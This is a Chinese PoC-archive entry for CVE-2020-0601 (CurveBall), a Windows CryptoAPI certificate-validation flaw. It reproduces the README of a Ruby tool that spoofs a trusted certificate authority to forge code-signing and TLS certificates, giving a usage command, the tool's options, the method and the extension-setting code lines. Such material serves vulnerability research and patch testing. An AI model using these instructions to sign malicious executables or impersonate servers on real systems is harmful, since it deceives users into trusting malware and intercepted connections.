关联漏洞
标题:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)Description:Microsoft Windows CryptoAPI是美国微软(Microsoft)公司的一个在Windows 操作系统中添加的密码编译机能。作为资料加密与解密功能的重要基础,CryptoAPI 支持同步,异步的密钥加密处理,以及操作系统中的数字证书 的管理工作。 Microsoft Windows CryptoAPI (Crypt32.dll)中验证椭圆曲线加密(ECC)证书的方法存在信任管理问题漏洞。攻击者可通过使用欺骗性的代码签名证书利用该漏洞签名恶意的可执行文件。以下产品及版本受到影响:Micr
Description
CurveBall CVE exploitation
介绍
# CVE-2020-0601 : CurveBall CVE exploitation
This ruby script can be used to spoof a legit certificate authority and generat a certificate that will be considered valid for Windows computer affected by the CurveBall vulnerability.
You need to get a certificate comming from the certificate authority you want to spoof.
Then, you can run the script with the following command :
`ruby gen-rogue-cert.rb -in=ca.crt -subj="/C=France/ST=IleDeFrance/L=Paris/O=YoannDqr" -out=cert_rb.p12 -exe=DoNotDebugMe.exe -sh -type=exe -sh | bash`
The script can be used to generate signed PE as well as TLS servers.
## List of options
- -in : mandatory ; path to the trusted CA cert to spoof
- -out : mandatory ; path to store the generated certificate
- -type : mandatory ; can be 'exe' for code signing certificate or 'tls' for server and client authentication certificate
- -exe : optionnal ; name of the executable to sign
- -subj : optional ; subject of the generated cert
- -sh : flag optional ; return only the bash command needed to use the certificate (ex : command line to sign an executable)
## Technologies Used ##
The script is based on the ruby OpenSSL library https://github.com/ruby/openssl.
It will generate a fake CA from the public key found in the inputed certificate.
Then, it will generate a certificate signing request and signs it with the fake CA certificate.
The certificate will be packed in a pcks12 file and saved on your computer.
To add features as generating TLS certificates, just modify extensions of the certificate generated from the certificate signing request.
- Code signing : `csr_cert.add_extension(extension_factory.create_extension('extendedKeyUsage', 'codeSigning'))`
- TLS certificate : `csr_cert.add_extension(extension_factory.create_extension('extendedKeyUsage', 'serverAuth, clientAuth'))`
文件快照
[4.0K] /data/pocs/51d4c4b80f9a43cd58d9e412f494e97a024ba44c
├── [1.1K] ca.crt
├── [5.7K] gen-rogue-cert.rb
└── [1.8K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。